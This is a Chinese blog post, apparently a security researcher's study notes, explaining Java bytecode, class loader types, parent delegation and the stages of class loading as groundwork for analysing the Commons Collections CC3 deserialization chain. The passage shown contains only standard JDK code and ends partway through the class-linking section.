<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    <meta name="description" content="Hexo Theme Redefine">
    <meta name="author" content="GTL-JU">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-redefine.png">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link rel="preconnect" href="https://evan.beee.top" crossorigin>
    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2023/07/31/java动态加载字节码/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="一、前言在前面分析CC1和CC6利用链的时候，都是通过transform之间之间执行命令，但是在cc3中是通过动态类加载来实现自动执行恶意类的代码。然后这里在对cc3利用链分析前，先对java动态加载字节码进行一个学习。 二、java字节码java字节码是java程序源代码经过编译器(javac)编译生成的中间代码，严格来说，它并不是本地机器代码，而是一种与平台无关的低级指令集。这些指令由java">
<meta property="og:type" content="article">
<meta property="og:title" content="java动态加载字节码">
<meta property="og:url" content="http://example.com/2023/07/31/java%E5%8A%A8%E6%80%81%E5%8A%A0%E8%BD%BD%E5%AD%97%E8%8A%82%E7%A0%81/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="一、前言在前面分析CC1和CC6利用链的时候，都是通过transform之间之间执行命令，但是在cc3中是通过动态类加载来实现自动执行恶意类的代码。然后这里在对cc3利用链分析前，先对java动态加载字节码进行一个学习。 二、java字节码java字节码是java程序源代码经过编译器(javac)编译生成的中间代码，严格来说，它并不是本地机器代码，而是一种与平台无关的低级指令集。这些指令由java">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731140856122.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731142609856.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731160759360.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731154334733.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731165428773.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731165439886.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731165933112.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731171312206.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731171405819.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731180256672.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731181531200.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731183014046.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731183214197.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731183356861.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731184214068.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731184353198.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731190017497.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802171846688.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802172251738.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802175110466.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802175023651.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802175259884.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802175419393.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802180950718.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802180931720.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802181053462.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802181259643.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731194144950.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731194232897.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731194642542.png">
<meta property="og:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731194955697.png">
<meta property="article:published_time" content="2023-07-31T12:49:24.000Z">
<meta property="article:modified_time" content="2023-08-02T12:06:28.362Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="java">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731140856122.png">
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/logo.png" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/logo.png">
    <!--- Page Info-->
    
    <title>
        
            java动态加载字节码 -
        
        JU blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
<link rel="stylesheet" href="/assets/fonts.css">

    <!--- Font Part-->
    
    
    
        <link href="https://fonts.googleapis.com/css2?family=Noto+Sans+SC:wght@400;500;700&display=swap" rel="stylesheet">
    
    

    <!--- Inject Part-->
    
    <script id="hexo-configurations">
    let Global = window.Global || {};
    Global.hexo_config = {"hostname":"example.com","root":"/","language":"zh-CN","path":"search.xml"};
    Global.theme_config = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center"},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":true,"list":["php","java","比赛wp","环境搭建"]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":true,"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null},"global":{"fonts":{"chinese":{"enable":true,"family":"Noto Sans SC","url":"https://fonts.googleapis.com/css2?family=Noto+Sans+SC:wght@400;500;700&display=swap"},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"busuanzi_counter":{"enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"pjax":true,"open_graph":true},"home_banner":{"enable":true,"image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"JU's blog","subtitle":{"text":[],"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"audios":[{"name":null,"artist":null,"url":null,"cover":null},{"name":null,"artist":null,"url":null,"cover":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.1.0","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Status":{"path":"https://status.evanluo.top/","icon":"fa-regular fa-chart-bar"},"About":{"icon":"fa-regular fa-user","submenus":{"Me":"/about","Github":"https://github.com/GTL-JU","Blog":"https://www.cnblogs.com/GTL-JU/","Friends":"/friends"}},"友链":{"icon":"fa-regular fa-link","path":"/links/"}},"search":{"enable":true,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","announcement":null,"links":{"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Tags":{"path":"/tags","icon":"fa-regular fa-tags"},"Categories":{"path":"/categories","icon":"fa-regular fa-folder"}}},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}}};
    Global.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <span class="pjax-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container">

    

    <div class="main-content-container">

        <div class="main-content-header">
            <header class="navbar-container">
    
    <div class="navbar-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                JU blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                            <i class="fa-regular fa-house"></i>
                                        
                                        首页
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/archives"  >
                                    
                                        
                                            <i class="fa-regular fa-archive"></i>
                                        
                                        归档
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    target="_blank" rel="noopener" href="https://status.evanluo.top/"  >
                                    
                                        
                                            <i class="fa-regular fa-chart-bar"></i>
                                        
                                        状态
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="has-dropdown" 
                                    href="#" onClick="return false;">
                                    
                                        
                                            <i class="fa-regular fa-user"></i>
                                        
                                        关于&nbsp;<i class="fa-solid fa-chevron-down"></i>
                                    
                                </a>
                                <!-- Submenu -->
                                
                                    <ul class="sub-menu">
                                    
                                        <li>
                                        <a href="/about">ME
                                        </a>
                                        </li>
                                    
                                        <li>
                                        <a target="_blank" rel="noopener" href="https://github.com/GTL-JU">GITHUB
                                        </a>
                                        </li>
                                    
                                        <li>
                                        <a target="_blank" rel="noopener" href="https://www.cnblogs.com/GTL-JU/">BLOG
                                        </a>
                                        </li>
                                    
                                        <li>
                                        <a href="/friends">友情链接
                                        </a>
                                        </li>
                                    
                                    </ul>
                                
                            </li>
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/links/"  >
                                    
                                        
                                            <i class="fa-regular fa-link"></i>
                                        
                                        友链
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                    
                        <li class="navbar-item search search-popup-trigger">
                            <i class="fa-solid fa-magnifying-glass"></i>
                        </li>
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fa-solid fa-magnifying-glass"></i></div>
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="navbar-drawer">
        <ul class="drawer-navbar-list">
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        href="/"  >
                             
                                
                                    <i class="fa-regular fa-house"></i>
                                
                                首页
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        href="/archives"  >
                             
                                
                                    <i class="fa-regular fa-archive"></i>
                                
                                归档
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        target="_blank" rel="noopener" href="https://status.evanluo.top/"  >
                             
                                
                                    <i class="fa-regular fa-chart-bar"></i>
                                
                                状态
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="has-dropdown" 
                        href="#" onClick="return false;">
                            
                                
                                    <i class="fa-regular fa-user"></i>
                                
                                关于&nbsp;<i class="fa-solid fa-chevron-down"></i>
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                              
                        
                            <li class="dropdown-item flex-center">
                                <a class="dropdown-item" href="/about">ME</a>
                            </li>
                        
                            <li class="dropdown-item flex-center">
                                <a class="dropdown-item" target="_blank" rel="noopener" href="https://github.com/GTL-JU">GITHUB</a>
                            </li>
                        
                            <li class="dropdown-item flex-center">
                                <a class="dropdown-item" target="_blank" rel="noopener" href="https://www.cnblogs.com/GTL-JU/">BLOG</a>
                            </li>
                        
                            <li class="dropdown-item flex-center">
                                <a class="dropdown-item" href="/friends">友情链接</a>
                            </li>
                        
                    
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        href="/links/"  >
                             
                                
                                    <i class="fa-regular fa-link"></i>
                                
                                友链
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            
            
                <div class="article-title">
                    <h1 class="article-title-regular">java动态加载字节码</h1>
                </div>
            
                
            

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="/images/logo.png">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">GTL-JU</span>
                            
                                <span class="author-label">Lv3</span>
                            
                        </div>
                        <div class="meta-info">
                            <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2023-07-31 20:49:24</span>
        <span class="mobile">2023-07-31 20:49</span>
        <span class="hover-info">创建</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2023-08-02 20:06:28</span>
            <span class="mobile">2023-08-02 20:06</span>
            <span class="hover-info">更新</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/java/">java</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fa-regular fa-typewriter"></i>&nbsp;<span>7.3k 字</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fa-regular fa-clock"></i>&nbsp;<span>29 分钟</span>
        </span>
    
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content markdown-body">
                <h1 id="一、前言"><a href="#一、前言" class="headerlink" title="一、前言"></a>一、前言</h1><p>在前面分析CC1和CC6利用链的时候，都是通过transform之间之间执行命令，但是在cc3中是通过动态类加载来实现自动执行恶意类的代码。然后这里在对cc3利用链分析前，先对java动态加载字节码进行一个学习。</p>
<h1 id="二、java字节码"><a href="#二、java字节码" class="headerlink" title="二、java字节码"></a>二、java字节码</h1><p>java字节码是java程序源代码经过编译器(javac)编译生成的中间代码，严格来说，它并不是本地机器代码，而是一种与平台无关的低级指令集。这些指令由java虚拟机（JVM）解释执行，使得java程序可以一次编写，随处执行。使得上层开发者只需将自己的代码编译一次，就可以运行在不同平台的JVM虚拟机中。</p>
<p>我们写的java(.java)程序通过编译器编译成的就是字节码文件(.class)。</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">public class helloworld &#123;</span><br><span class="line">    public static void main(String[] args) &#123;</span><br><span class="line">        System.out.println(&quot;hello,world&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>通过编译器进行编译：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javac 文件名.java</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731140856122.png"
                      alt="image-20230731140856122"
                ></p>
<p>我们这里通过010打开编译器生成的class文件就可以看到生成的字节码了。</p>
<p>可以看到在我们生成的字节码中包含了常量，访问标志，类信息，字段信息，方法信息，方法代码，以及字节码指令等等这些内容共同构成了java字节码结构，java虚拟机在运行时通过解释这些字节码指令来执行java程序。</p>
<p>具体的关于字节码的每一块的解释可以看看这篇文章:</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://www.jianshu.com/p/fa53b4169df9" >https://www.jianshu.com/p/fa53b4169df9 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p>下图引自P神java安全漫谈</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731142609856.png"
                      alt="image-20230731142609856"
                ></p>
<h1 id="三、ClassLoader（类加载器）"><a href="#三、ClassLoader（类加载器）" class="headerlink" title="三、ClassLoader（类加载器）"></a>三、ClassLoader（类加载器）</h1><p>在上面我们说可以java虚拟机通过解释字节码来执行java程序</p>
<p>但是我们想要通过解释器去解释字节码执行java程序要先将字节码加载到内存中,那么在java虚拟机中将字节码加载到内存中就是通过类加载器。这个JVM的重要组件来实现的。当classloader将字节码加载到内存中，会创建相应的Class对象，然后解释器逐条解释执行这些字节码指令，然后执行对应的操作，并根据指令的结果继续执行下一条指令。解释器的作用是将字节码翻译成实际的操作，实现了 Java 代码在不同平台上的执行。</p>
<p>但是系统程序在启动时，不会一次性加载所有的程序要使用的Class文件到内存中，而是根据程序的需要，通过类加载机制动态将程序要使用的Class文件加载到内存中。只有当class文件杯加载到内存中，才能够被调用。这个机制其实就是类加载机制，也就是classloader（classloader在这里既指类加载器也指类加载机制）。</p>
<p>classloader类的核心方法：</p>
<ol>
<li><code>loadClass</code>（加载指定的Java类）</li>
<li><code>findClass</code>（查找指定的Java类）</li>
<li><code>findLoadedClass</code>（查找JVM已经加载过的类）</li>
<li><code>defineClass</code>（定义一个Java类）</li>
<li><code>resolveClass</code>（链接指定的Java类）</li>
</ol>
<h2 id="classLoader的分类"><a href="#classLoader的分类" class="headerlink" title="classLoader的分类"></a>classLoader的分类</h2><p>在java中，类加载器根据加载类的方式和范围，可以分为以下几种类型：</p>
<p><strong>1、引导类加载器（Bootstrap ClassLoade）</strong>： 它是 JVM 的一部分，是最顶层的类加载器，负责加载 Java 核心类库，如 <code>java.lang.*</code> 等。引导类加载器是用本地代码实现的，无法在 Java 程序中直接获取它的引用。由于它是 JVM 内置的，无需实现，其加载路径为 JVM 的系统类路径（JRE&#x2F;lib&#x2F;*）。</p>
<p><strong>2、扩展类加载器（Extension ClassLoader）</strong>：它是 <code>sun.misc.Launcher$ExtClassLoader</code>，负责加载 Java 扩展目录（jre&#x2F;lib&#x2F;ext）下的类库。Java 扩展目录是 JVM 预定义的，用于存放供 JVM 扩展使用的类库。扩展类加载器的父类加载器是引导类加载器。</p>
<p><strong>3、应用程序类加载器（Application ClassLoader）</strong>： 它是 <code>sun.misc.Launcher$AppClassLoader</code>，也称为系统类加载器。应用程序类加载器负责加载应用程序类路径（CLASSPATH）上指定的类库，包括用户自定义的类和第三方库。应用程序类加载器的父类加载器是扩展类加载器。</p>
<p><strong>4、自定义加载器（Custom ClassLoader）</strong>：开发人员可以通过继承 <code>ClassLoader</code> 类，自定义自己的类加载器。自定义类加载器允许实现特定的类加载需求，例如从网络、数据库或其他来源动态加载类。自定义类加载器需要重写 <code>findClass</code> 方法来定制类的加载逻辑，并通常还会重写 <code>loadClass</code> 方法来实现自定义加载策略。其实也就是用户自定义。</p>
<h2 id="双亲委派机制"><a href="#双亲委派机制" class="headerlink" title="双亲委派机制"></a>双亲委派机制</h2><p>上面我们介绍了clasloader的加载器分类：</p>
<p>然后我们这里了解一下类加载的双亲委派</p>
<p>下面我们通过一张图来介绍双亲委派模型：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731160759360.png"
                      alt="image-20230731160759360"
                ></p>
<p><strong>双亲委派机制</strong></p>
<p>分为委托阶段和派发阶段：</p>
<p>委托阶段：</p>
<p>当一个类被加载的时候首先会先判断自己是否已经加载，如果加载了之间返回相应的对象，如果没有被加载，则委托给父类加载器。父类加载器同样也是判断是否加载，同样未加载的话，委托给其父类加载器，直至到达顶层的类加载器引导类加载器（Bootstrap ClassLoade），相应的加载了就返回相应对象，如果直到引导层加载器都未加载成功，说明类未加载，这时就会进入派发阶段，查找并加载类。</p>
<p>派发阶段:</p>
<p>当到达引导类加载器，bootstrapClassLoader 会去对应的目录下（<code>%JAVA_HOME%jre/lib/</code>）搜索该类，找到了就加载类，未能找到就派发给子类加载器进行加载，子类执行的也是执行同样的操作，搜索这个类，有的话加载类，没有继续派发给子类加载器。</p>
<p>根据这个模型我们可以看到最终会到达自定义加载器，如果自定义加载器也未能加载成功就会抛出<code>ClassNotFoundException</code> 异常并退出。</p>
<p>综合来说就是，当我们加载一个类的时候会先判断自己是否加载，加载的话就直接返回，没加载就调用父类加载器，直到引导类加载器都没有加载成功，在调用子类加载器进行加载,直到调用到自定义加载器。</p>
<p>我们这里结合loaderclass代码进行具体分析一下：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">protected Class&lt;?&gt; loadClass(String name, boolean resolve)</span><br><span class="line">       throws ClassNotFoundException</span><br><span class="line">   &#123;</span><br><span class="line">       synchronized (getClassLoadingLock(name)) &#123;</span><br><span class="line">           // First, check if the class has already been loaded</span><br><span class="line">           Class&lt;?&gt; c = findLoadedClass(name);</span><br><span class="line">           if (c == null) &#123;                                                //双亲委派</span><br><span class="line">               long t0 = System.nanoTime();</span><br><span class="line">               try &#123;</span><br><span class="line">                   if (parent != null) &#123;</span><br><span class="line">                       c = parent.loadClass(name, false);</span><br><span class="line">                   &#125; else &#123;</span><br><span class="line">                       c = findBootstrapClassOrNull(name);</span><br><span class="line">                   &#125;</span><br><span class="line">               &#125; catch (ClassNotFoundException e) &#123;</span><br><span class="line">                   // ClassNotFoundException thrown if class not found</span><br><span class="line">                   // from the non-null parent class loader</span><br><span class="line">               &#125;</span><br><span class="line"></span><br><span class="line">               if (c == null) &#123;</span><br><span class="line">                   // If still not found, then invoke findClass in order</span><br><span class="line">                   // to find the class.</span><br><span class="line">                   long t1 = System.nanoTime();</span><br><span class="line">                   c = findClass(name);</span><br><span class="line"></span><br><span class="line">                   // this is the defining class loader; record the stats</span><br><span class="line">                   sun.misc.PerfCounter.getParentDelegationTime().addTime(t1 - t0);</span><br><span class="line">                   sun.misc.PerfCounter.getFindClassTime().addElapsedTimeFrom(t1);</span><br><span class="line">                   sun.misc.PerfCounter.getFindClasses().increment();</span><br><span class="line">               &#125;</span><br><span class="line">           &#125;</span><br><span class="line">           if (resolve) &#123;</span><br><span class="line">               resolveClass(c);</span><br><span class="line">           &#125;</span><br><span class="line">           return c;</span><br><span class="line">       &#125;</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure></div>

<p>首先通过findLoadedClass(name）方法检查类是否已经加载了，如果加载了就直接返回，不会重复加载，没有加载就做加载处理，</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">if (c == null) &#123;</span><br><span class="line">     long t0 = System.nanoTime();</span><br><span class="line">     try &#123;</span><br><span class="line">         if (parent != null) &#123;</span><br><span class="line">             c = parent.loadClass(name, false);</span><br><span class="line">         &#125; else &#123;</span><br><span class="line">             c = findBootstrapClassOrNull(name);</span><br><span class="line">         &#125;</span><br><span class="line">     &#125; catch (ClassNotFoundException e) &#123;</span><br><span class="line">         // ClassNotFoundException thrown if class not found</span><br><span class="line">         // from the non-null parent class loader</span><br><span class="line">     &#125;</span><br></pre></td></tr></table></figure></div>

<p>如果类未被加载，首先优先尝试使用父类加载器即调用 <code>parent.loadClass(name, false)（这里其实也就是双亲委派加载机制）;</code>方法parent是当前加载的父类加载器。同样父类加载器在加载类时也会按同样的方法进行。</p>
<p>如果父类加载器加载成功，返回相应的class对象 c。</p>
<p>如果未加载成功，继续调用父类的父类加载器直到尝试调用引导类加载器，这里即调用<code>findBootstrapClassOrNull(name)</code>，这里关于引导类加载器我们上面有介绍。同样的加载成功返回对象c，如果引导类加载器也未能加载成功，说明类既不在父类加载器中，也不在引导类加载器中，表面类还未加载。</p>
<p>则会调用<code>findClass(name)</code> 方法</p>
<p>我们这里跟进到findclass方法：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731154334733.png"
                      alt="image-20230731154334733"
                ></p>
<p>我们可以看到findClass方法里面是空的，也就是未定义，其实这里就是要用户自己去定义实现的，也就是我们上面说的用户自定义加载器。如果Classloader中并没有重写findClass方法则会抛出异常。如果重写了findClass方法，则会根据重写的逻辑查找类名，并加载字节码，返回对象的class对象.</p>
<p>优点：避免重复加载某些类，当父加载器已经加载了某个类后，子加载器不会重复加载。<br>            双亲委派模型可以提供类加载的安全性。由于类加载是从上到下依次委派的，子类加载器只有在父类加载器无法加载指定类时才会尝试加载。这样可以避免恶意代码替换系统类，防止不信任的类替代核心类库，提高了系统的安全性。 </p>
<p>下面我们了解一下类加载的具体过程:</p>
<h2 id="类加载的方式"><a href="#类加载的方式" class="headerlink" title="类加载的方式"></a>类加载的方式</h2><p>java虚拟机启动时加载java类文件的两种方式：</p>
<p><strong>1、隐式加载：</strong>隐式加载是指 JVM 在启动时自动加载需要的类到内存中。这些类通常包括 Java 核心类库（如 <code>java.lang.*</code> 等）和一些基础类，它们在 JVM 启动过程中会被预先加载，以确保 JVM 的正常运行。这些类由引导类加载器（Bootstrap ClassLoader）负责加载，它是 JVM 的一部分，是最顶层的类加载器，使用本地代码实现，无法在 Java 程序中直接获取其引用。</p>
<p><strong>2、显式加载：</strong>显式加载是指在 Java 程序运行时通过代码显式地加载类。Java 程序可以使用类加载器（ClassLoader）来加载额外的类，比如用户自定义的类或第三方库。应用程序类加载器（Application ClassLoader）是负责加载应用程序类路径（CLASSPATH）上指定的类库，包括用户自定义的类和第三方库。开发人员也可以通过继承 <code>ClassLoader</code> 类来实现自定义的类加载器，以实现特定的类加载需求。</p>
<p>通过上面的概念我们可以理解为动态加载，即通过反射，或CLassloader动态加载class文件，而隐式加载new类实列，java.lang.Object，基础数据类型的包装类、基于异常数据的包装类等等这些。</p>
<h2 id="类加载的过程"><a href="#类加载的过程" class="headerlink" title="类加载的过程"></a>类加载的过程</h2><p>上面我们了解了类加载的两种方式，下面我们具体分析一下类加载的过程：</p>
<ol>
<li><strong>加载（Loading）：</strong> 加载是类加载的第一个阶段，它是将类的字节码文件（通常是以 <code>.class</code> 后缀的文件）从磁盘或网络加载到内存中的过程。加载过程由类加载器（ClassLoader）来完成。类加载器根据类的全限定名（包括包名和类名）查找类的字节码文件，然后读取字节码文件，并创建对应的 <code>Class</code> 对象。</li>
<li><strong>连接（Linking）：</strong> 连接是类加载的第二个阶段，它包括三个子阶段：验证、准备和解析。<ul>
<li><strong>验证（Verification）：</strong> 在验证阶段，JVM 将对加载的字节码进行验证，以确保字节码是合法、符合规范的。验证阶段主要包括类型检查、字节码验证、符号引用验证等，用于确保字节码的正确性和安全性。</li>
